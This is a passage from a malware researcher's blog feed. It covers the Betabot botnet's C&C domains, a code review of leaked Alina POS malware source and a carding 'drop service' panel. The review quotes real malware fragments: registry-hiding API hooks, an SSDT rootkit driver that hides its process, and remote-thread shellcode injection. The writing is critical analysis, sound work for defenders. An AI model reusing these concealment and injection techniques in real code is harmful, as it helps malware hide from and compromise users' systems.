Files:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-w7h5D1UaJVgUzJcY_dBinyps5Q6jmj01UN1fsy-Eo6anBgZF9q8xsyUkb4X8DA2IcVghBiHL0zqk50QFO96YzxXTtIlfYJEpJrYZSoIbzQiCFWV5YWZC52Cq_7mLTRRE-PvbAQ6rTCQ/s1600/23-09-2013+22-52-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-w7h5D1UaJVgUzJcY_dBinyps5Q6jmj01UN1fsy-Eo6anBgZF9q8xsyUkb4X8DA2IcVghBiHL0zqk50QFO96YzxXTtIlfYJEpJrYZSoIbzQiCFWV5YWZC52Cq_7mLTRRE-PvbAQ6rTCQ/s400/23-09-2013+22-52-20.png" height="320" width="400" /></a></div> <br /> Users notice:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUjHCyrlfD0QKyN1nsSa5qntRfKrTmrlnXZylscSwLh4-ZI2KBwLadM0-mTF_XuIV69mIzDyy8qGLfgWhEU-BKev9bYFwPKHnJlPl5GrvzKoRAVeGCvoo9Dhf2XHxV133Ek6saSKk3Kc/s1600/23-09-2013+22-53-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUjHCyrlfD0QKyN1nsSa5qntRfKrTmrlnXZylscSwLh4-ZI2KBwLadM0-mTF_XuIV69mIzDyy8qGLfgWhEU-BKev9bYFwPKHnJlPl5GrvzKoRAVeGCvoo9Dhf2XHxV133Ek6saSKk3Kc/s400/23-09-2013+22-53-04.png" height="320" width="400" /></a></div> <br /> AV Checker:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVPODLK-7WSRH_XgVOpZdxWx6XGjYk4wHfvoGzke9rM7U1ctNVslFCt_CRNnmcDO7YkOtUQaKttwdM3sQ_Y-OtsNsaxg4-Co4PzBx3mpO1tE_grg8oJr8A4Te9zQsxZ1lb3f-85SeEID8/s1600/23-09-2013+22-53-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVPODLK-7WSRH_XgVOpZdxWx6XGjYk4wHfvoGzke9rM7U1ctNVslFCt_CRNnmcDO7YkOtUQaKttwdM3sQ_Y-OtsNsaxg4-Co4PzBx3mpO1tE_grg8oJr8A4Te9zQsxZ1lb3f-85SeEID8/s400/23-09-2013+22-53-51.png" height="320" width="400" /></a></div> <br /> 1.7.0.1:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8zdgy8X0S5GwJSKPs8cNyjv4yOCaDF4tGwiDZo0FVdNQ0fVQ3DqqHc1nU7U0aUVCtqLIsQMjzturUw1D5V3AkGz9WF4ncy8iZ2ohKlES3b3gf9RXKTadHf_PzihTXKMtwLaWfU2Zky3s/s1600/19-04-2014+17-28-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8zdgy8X0S5GwJSKPs8cNyjv4yOCaDF4tGwiDZo0FVdNQ0fVQ3DqqHc1nU7U0aUVCtqLIsQMjzturUw1D5V3AkGz9WF4ncy8iZ2ohKlES3b3gf9RXKTadHf_PzihTXKMtwLaWfU2Zky3s/s1600/19-04-2014+17-28-54.png" height="250" width="400" /></a></div> <br /> The botmaster was running a support site at the url betabot.ru that i've monitored since... i don't know almost the begining till the end.<br /> I've really collected a lot of datas and was constantly flagging new C&amp;C urls even before they was active.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2DbsYgLM34689-i25Phj9K6vxoVLbceBHYg0oaFEfIiZXSXN7c4RrVZJsJITtXmzImN2qCkmPMBbIDzXEFuC9CqJQ12u04esB5ZAJu0hkre4Yl1ZKLpSMytLrgW0p2BOHKbj0Vg-cgtI/s1600/2014-11-09_17-14-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2DbsYgLM34689-i25Phj9K6vxoVLbceBHYg0oaFEfIiZXSXN7c4RrVZJsJITtXmzImN2qCkmPMBbIDzXEFuC9CqJQ12u04esB5ZAJu0hkre4Yl1ZKLpSMytLrgW0p2BOHKbj0Vg-cgtI/s1600/2014-11-09_17-14-13.png" height="301" width="400" /></a></div> <br /> Inquiries sent to the betabot team (before they started the support forum):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZX79V6sJQT9P3Fxn-MGnXPcZ3m-uWGTxlPkcnGSg0cG6B2EicNEYWH6PI4G0ZXluRgpIIf2NVAqsSqEbSypeaviRANzokUhzBC9pLKHg2MIF_yse_ULUOy2jcLzyKQuQfhZI-CSUVEEk/s1600/2014-11-09_17-15-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZX79V6sJQT9P3Fxn-MGnXPcZ3m-uWGTxlPkcnGSg0cG6B2EicNEYWH6PI4G0ZXluRgpIIf2NVAqsSqEbSypeaviRANzokUhzBC9pLKHg2MIF_yse_ULUOy2jcLzyKQuQfhZI-CSUVEEk/s1600/2014-11-09_17-15-48.png" height="306" width="400" /></a></div> <br /> Site structure:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9KNYwSaw-5os8WqLwcEXMjX4p6_MLIspNzI4E9bVj8guK23WLKHoThFGbrfYTQlEvCP7NIyL72nZkQ51Xulf2cwLX-GdKUw6LVT-Ov3JhWV3yJuRMIQGSA3vwFOJs3urOILooEu6M4Y4/s1600/2014-11-09_17-17-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9KNYwSaw-5os8WqLwcEXMjX4p6_MLIspNzI4E9bVj8guK23WLKHoThFGbrfYTQlEvCP7NIyL72nZkQ51Xulf2cwLX-GdKUw6LVT-Ov3JhWV3yJuRMIQGSA3vwFOJs3urOILooEu6M4Y4/s1600/2014-11-09_17-17-41.png" height="258" width="400" /></a></div> <br /> Some clients kits:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgafnsE6IrByfvWJj6VpHwprS9zp7HgJrNL8c8F29TckVhlKzvxr-Dag0rK3MAzl3ITP08GufjMSt4BBF-7J-j3PWFypIoSPjh0mKsGng6Vqz16ZoQW-3iVYaA27HGvfY826CMt3TZ3sNs/s1600/2014-11-09_17-18-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgafnsE6IrByfvWJj6VpHwprS9zp7HgJrNL8c8F29TckVhlKzvxr-Dag0rK3MAzl3ITP08GufjMSt4BBF-7J-j3PWFypIoSPjh0mKsGng6Vqz16ZoQW-3iVYaA27HGvfY826CMt3TZ3sNs/s1600/2014-11-09_17-18-32.png" height="196" width="400" /></a></div> <br /> Finally some people got busted using these informations..<br /> If you want an example.. 'Spit Fyre' ex super moderator at Trojanforge who reside in the same country as me.<br /> If you wonder why he disappeared you know why now.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhx_L9tfAnvwU-BcrKCY-P3taVgOUPIeiAgKnDo8vAcecEaUI-gNM-6HUzZST_Gz7J4n1Oxr8bUo_gOwxg8XYZGFa8WUjdO4osUmtH4xJVKM2h3j7zlrpjwMpRxg8jk8LLQUPm06J-UEA/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhx_L9tfAnvwU-BcrKCY-P3taVgOUPIeiAgKnDo8vAcecEaUI-gNM-6HUzZST_Gz7J4n1Oxr8bUo_gOwxg8XYZGFa8WUjdO4osUmtH4xJVKM2h3j7zlrpjwMpRxg8jk8LLQUPm06J-UEA/s1600/1.png" height="368" width="400" /></a></div> <br /> Spit Fyre requesting an admin of Hackyard to delete his account after he got cops at door:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQx3HNscHzigCllIAsWifVSBtsz27scVo5dttecXNfZPxxg5nCt9-p-sUR790sj5u_yE_rDxcRkHA1s_iWyUUJ3r_GttSCh4ZOAHWgQ9097jmE1uZVl6OxCoTzvMWKahMhMtDEGKl2OE/s1600/09-04-2014+15-28-26.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQx3HNscHzigCllIAsWifVSBtsz27scVo5dttecXNfZPxxg5nCt9-p-sUR790sj5u_yE_rDxcRkHA1s_iWyUUJ3r_GttSCh4ZOAHWgQ9097jmE1uZVl6OxCoTzvMWKahMhMtDEGKl2OE/s1600/09-04-2014+15-28-26.png" height="126" width="400" /></a></div> <br /> Some of his domains:<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.104/information/">124.248.205.104</a> - adress: DARKNESS.SU<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.104/information/">124.248.205.104</a> - adress: WEED.SU<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.104/information/">124.248.205.104</a> - adress: MEZIAMUSSUCEMAQUEUE.SU<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.104/information/">124.248.205.104</a> - adress: UMBXD15896.SU<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.135/information/">124.248.205.135</a> - adress: STYXB1TCH35.SU<br /> • dns: 1 ›› ip: <a href="https://www.virustotal.com/en/ip-address/124.248.205.135/information/">124.248.205.135</a> - adress: J1NXFYR3.SU<br /> <br /> Anyway it's useless to talk about him and others betabot clients who had visits, the current status of betabot is stalled now and someone even made a builder for the 1.7.0.1 version.<br /> Betabot was a creative malware, plagued by bugs though. https://www.xylibox.com/2015/04/betabot-retrospective.htmlnoreply@blogger.com (Steven K)6tag:blogger.com,1999:blog-5365964245877416061.post-5589481365037600265Wed, 14 Jan 2015 23:07:00 +00002015-01-15T00:07:19.272+01:00Alinafailmemory scrapperPoint Of SalePoint-of-SalePOSpos malwareram scrappersparksparksI got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature.<br /> Josh Grunzweig did already an <a href="http://jgrunzweig.github.io/posts/2015/01/alina-starts-to-blur-the-lines/">interesting coverage</a> of a sample, but what worth this new version ?<br /> <br /> InjectedDLL.c from the source is a Chinese copy-paste of <a href="http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html">http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html</a> and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks :D<br /> a comment is still in Chinese as you can see on the screenshot.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv4xbT-57XdNPjTduPIc84Tq86H00ICDQ9NAMtOEk2Fgdw-73QFGma8QTcw5rThSFpZcGWodN324r2JMPLLk_LaGTTKrYEjx99B_wEKChrqi22E0PCRpQxutWEh8W0tvyBQCdRKc3mus/s1600/2015-01-14_10-26-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv4xbT-57XdNPjTduPIc84Tq86H00ICDQ9NAMtOEk2Fgdw-73QFGma8QTcw5rThSFpZcGWodN324r2JMPLLk_LaGTTKrYEjx99B_wEKChrqi22E0PCRpQxutWEh8W0tvyBQCdRKc3mus/s1600/2015-01-14_10-26-49.png" height="310" width="400" /></a></div> <br /> + this:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)<br /> {<br /> LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);<br /> if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)<br /> {<br /> Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);<br /> }<br /> return Result;<br /> }<br /> <br /> ...<br /> <br /> // Registry Value Hiding<br /> Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &amp;RegEnumValueANext);<br /> Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &amp;RegEnumValueWNext);</div> So many stupid mistakes in the code, no sanity checks in hooks, nothing stable.<br /> Haven't looked at a sample in the wild but i doubt it work anyhow.<br /> Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.<br /> <br /> This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking.<br /> Driver is ridiculously simple:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)<br /> {<br /> &nbsp; DriverObject-&gt;DriverUnload = (PDRIVER_UNLOAD)UnloadProc;<br /> &nbsp; BuildMdlForSSDT();<br /> &nbsp; InitStrings();<br /> &nbsp; SetHooks();<br /> &nbsp; return STATUS_SUCCESS;<br /> }</div> <br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> BOOL SetHooks()<br /> {<br /> &nbsp; if ( !NtQuerySystemInformationOrig )<br /> &nbsp;&nbsp;&nbsp; NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);<br /> &nbsp; if ( !NtEnumerateValueKeyOrig )<br /> &nbsp;&nbsp;&nbsp; NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);<br /> &nbsp; if ( !NtQueryDirectoryFileOrig )<br /> &nbsp;&nbsp;&nbsp; NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);<br /> &nbsp; return TRUE;<br /> }</div> <br /> All of them hide 'windefender' target process, file, registry.<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> void InitStrings()<br /> {<br /> &nbsp; RtlInitUnicodeString((PUNICODE_STRING)&amp;WindefenderProcessString, L"windefender.exe");<br /> &nbsp; RtlInitUnicodeString(&amp;WindefenderFileString, L"windefender.exe");<br /> &nbsp; RtlInitUnicodeString(&amp;WindefenderRegistryString, L"windefender");<br /> }</div> It's the malware name, Josh pointed also in this direction on his analysis.<br /> First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago )<br /> <a href="https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/">https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/</a><br /> <br /> Overall that dll seems unusued, alina project uses driver i mentioned.<br /> As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\base.cpp(78)</div> If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.<br /> <br /> Two copy-pasted methods with same mistake:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\base.cpp(298)<br /> source\grab\base.cpp(433)</div> Leaking process information handle pi.hProcess.<br /> <br /> Using hKey from failed function call:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\base.cpp(316):<br /> if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,&nbsp; KEY_ALL_ACCESS, &amp;hKey) != ERROR_SUCCESS) {<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RegCloseKey(hKey); </div> <br /> pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\monitoringthread.cpp(110):<br /> LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br /> if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &amp;BytesWritten);<br /> HANDLE ThreadHandle =&nbsp; CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &amp;TID);</div> <br /> Where hwid declared as char hwid[8];<br /> Reading invalid data from hdr-&gt;hwid: the readable size is 8 bytes, but 18 bytes may be read:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\panelrequest.cpp(73):<br /> memcpy(outkey, hdr-&gt;hwid, 18);</div> <br /> Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\panelrequest.cpp(173)</div> <br /> The prior call to strncpy might not zero-terminate string Result:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\scanner.cpp(159)</div> <br /> Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\watcher.cpp(61)<br /> source\grab\watcher.cpp(64)<br /> source\grab\watcher.cpp(71) </div> <br /> Signed unsigned mismatch:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\rootkitinstaller.cpp(47)</div> <br /> Unreferenced local variable hResult:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\base.cpp(158)</div> <br /> Using TerminateThread does not allow proper thread clean up:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> source\grab\watcher.cpp(125)</div> <br /> Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot.<br /> In any case that can count as a code addition or something 'new'<br /> For the panel... well it's like the bot, nothing changed at all.<br /> It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on...<br /> <br /> To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it.<br /> Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety.<br /> This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtJyqOBhEBiCbcUAzRhDAyNPk0XCVEY5HV7sP_NlprVy4crkFdE_HdE_2vUV3vcmKN5L31Zbv8hyaaECKqjLnGTD-lWfSghqV-aCSzo9r48HGXFah2zAAphW4C7lgHa3P1EkFW-HPj5CE/s1600/2015-01-14_10-39-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtJyqOBhEBiCbcUAzRhDAyNPk0XCVEY5HV7sP_NlprVy4crkFdE_HdE_2vUV3vcmKN5L31Zbv8hyaaECKqjLnGTD-lWfSghqV-aCSzo9r48HGXFah2zAAphW4C7lgHa3P1EkFW-HPj5CE/s1600/2015-01-14_10-39-01.png" height="243" width="400" /></a></div> Hi Benson.https://www.xylibox.com/2015/01/alina-sparks-source-code-review.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-5589514687673484136Wed, 14 Jan 2015 09:03:00 +00002015-01-14T10:03:42.536+01:00Consuellaconsuella.netDrop servicelampeduzaMoney launderingTiberium drop servicetiberiy.proUSPSДроп<br /> Consuella was a 'USPS drop service' run by one of the Lampeduza administrator.<br /> This type of service is used to help credit card thieves to "cash out" by sending carded labels service overseas (or not) via USPS.<br /> They was also constantly recruiting mules in United states to keep addresses in rotation.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqETM_jsgsiuEl3wjFqLUKy1u8XhYt8fLc8NAJI_8tGcZ8MJCSmx-R_dZhVW5Gs4N4GNIQrMnEyRucvxBQbM12rzekVBnDost7EK1ikArKSeGZfceSWq8os3U8TotMwhrTI5mBwUROFz8/s1600/2014-11-09_18-01-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqETM_jsgsiuEl3wjFqLUKy1u8XhYt8fLc8NAJI_8tGcZ8MJCSmx-R_dZhVW5Gs4N4GNIQrMnEyRucvxBQbM12rzekVBnDost7EK1ikArKSeGZfceSWq8os3U8TotMwhrTI5mBwUROFz8/s1600/2014-11-09_18-01-23.png" height="148" width="400" /></a></div> <br /> Here is what look like the service from an admin point of view:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxPAaQxHzpPsqJLMlfwkRc9byS8a1gr3q2vvtSmkbzDw3Rr4tPrHdhwBvJTv4UPl1qSVG6Prd_1AeAC1XlwFE8hKqWxwFXdm2yBLU-0S5rJX3A23d58M6oA4igOyGKiF7DFZeBGMh4TJE/s1600/02-10-2013+11-06-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxPAaQxHzpPsqJLMlfwkRc9byS8a1gr3q2vvtSmkbzDw3Rr4tPrHdhwBvJTv4UPl1qSVG6Prd_1AeAC1XlwFE8hKqWxwFXdm2yBLU-0S5rJX3A23d58M6oA4igOyGKiF7DFZeBGMh4TJE/s1600/02-10-2013+11-06-21.png" height="288" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjw41KUNhW-BU_Nyi1MD6dZyjUenXVHcEM7ErM74dSdyaPsB_mjtiZ8k7_JfdLdYPXanqfHRhmW7WzG5PLUpkLbBuOLZr03IGK6zUGxDEQMdADkBK9RmtVnlaphlyVvBvSyhY_NM4kEA/s1600/02-10-2013+11-08-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMjw41KUNhW-BU_Nyi1MD6dZyjUenXVHcEM7ErM74dSdyaPsB_mjtiZ8k7_JfdLdYPXanqfHRhmW7WzG5PLUpkLbBuOLZr03IGK6zUGxDEQMdADkBK9RmtVnlaphlyVvBvSyhY_NM4kEA/s1600/02-10-2013+11-08-45.png" height="288" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Add a payement:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNftZc6aQPtbYqfNChRTediYQ2HvAsCgUkOpKN4-E7kfZpJ2RYePGR3NJPr5MU0j_zPIb7aor7c1nO_F3LEKoK4oo2Al8RvKomIDUCAzZamKEitMW1t1qPz5IgKHNb6cCoNMF3IH738tw/s1600/02-10-2013+11-09-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNftZc6aQPtbYqfNChRTediYQ2HvAsCgUkOpKN4-E7kfZpJ2RYePGR3NJPr5MU0j_zPIb7aor7c1nO_F3LEKoK4oo2Al8RvKomIDUCAzZamKEitMW1t1qPz5IgKHNb6cCoNMF3IH738tw/s400/02-10-2013+11-09-45.png" height="346" width="400" /></a></div> <br /> Users:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfa-xRUb_Z8vg6o-yRTFtqSPln67qYOrcn2K-ueuOSVlIx8ZB0Cbpih61X1LTJqxqhX3FEcgt61cyJ9HVFTCkrMGXG8vJYoxGYolIpTiT-E0GtB38IDxAs5ueYYKD5Hiir0ex9GiUAegM/s1600/02-10-2013+11-12-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfa-xRUb_Z8vg6o-yRTFtqSPln67qYOrcn2K-ueuOSVlIx8ZB0Cbpih61X1LTJqxqhX3FEcgt61cyJ9HVFTCkrMGXG8vJYoxGYolIpTiT-E0GtB38IDxAs5ueYYKD5Hiir0ex9GiUAegM/s400/02-10-2013+11-12-06.png" height="400" width="363" /></a></div> Supports:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF47KfJ3kT-o1oJdxTPddhuGSng_QGKX0iEvYcxOksu4C3mTjV-LL4g40NS7VKja_yNsonP_HlkvLar2h_BLwVBSyEl4Q7zpIDMP2qhvlRFiBZxFnEIs5P16amBXkTXMdPiCF6CsV5DS8/s1600/02-10-2013+11-13-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF47KfJ3kT-o1oJdxTPddhuGSng_QGKX0iEvYcxOksu4C3mTjV-LL4g40NS7VKja_yNsonP_HlkvLar2h_BLwVBSyEl4Q7zpIDMP2qhvlRFiBZxFnEIs5P16amBXkTXMdPiCF6CsV5DS8/s400/02-10-2013+11-13-06.png" height="165" width="400" /></a></div> <br /> News:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXguSDl8JM5yv8QREVbNQdn8uZHB2uigsgdas-929MdFxDN0gZJokYxoRHLd8FCeZwPZc3gmeCgGbExAsbSOsGRd2yu_l8Os3GefU2crHFzNBkLKAm8k5LPemq3TnuhpnRm73gIZ21Wms/s1600/02-10-2013+11-15-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXguSDl8JM5yv8QREVbNQdn8uZHB2uigsgdas-929MdFxDN0gZJokYxoRHLd8FCeZwPZc3gmeCgGbExAsbSOsGRd2yu_l8Os3GefU2crHFzNBkLKAm8k5LPemq3TnuhpnRm73gIZ21Wms/s400/02-10-2013+11-15-37.png" height="313" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjxYrHNX7cLg93v6AhAdT-awV34VOh_mZwtor3U-UnQYDvDQO_mG6vTTEWir0_tzAz5mpyhe1ONIBYCHMPHKEQbP09Z9EGjuYBp-k_eho9-Fl39VsTpRPeIWBW1Y8Z_9YqhuVszl7n-ko/s1600/02-10-2013+11-16-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjxYrHNX7cLg93v6AhAdT-awV34VOh_mZwtor3U-UnQYDvDQO_mG6vTTEWir0_tzAz5mpyhe1ONIBYCHMPHKEQbP09Z9EGjuYBp-k_eho9-Fl39VsTpRPeIWBW1Y8Z_9YqhuVszl7n-ko/s400/02-10-2013+11-16-34.png" height="221" width="400" /></a></div> <br /> Although Consuella was incredibly simple compared to others drop-shipping service such as addtrack.biz and pac-man.co who had fake website for mules on the panel.https://www.xylibox.com/2015/01/tiberiumconsuella-usps-money-laundering.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-1688769849464994081Tue, 13 Jan 2015 00:53:00 +00002015-01-13T01:53:27.476+01:00CryptorbitWhen Cryptorbit ransomware was targeting people i've visited them<br /> <div class="separator" style="clear: both; text-align: center;"> <a 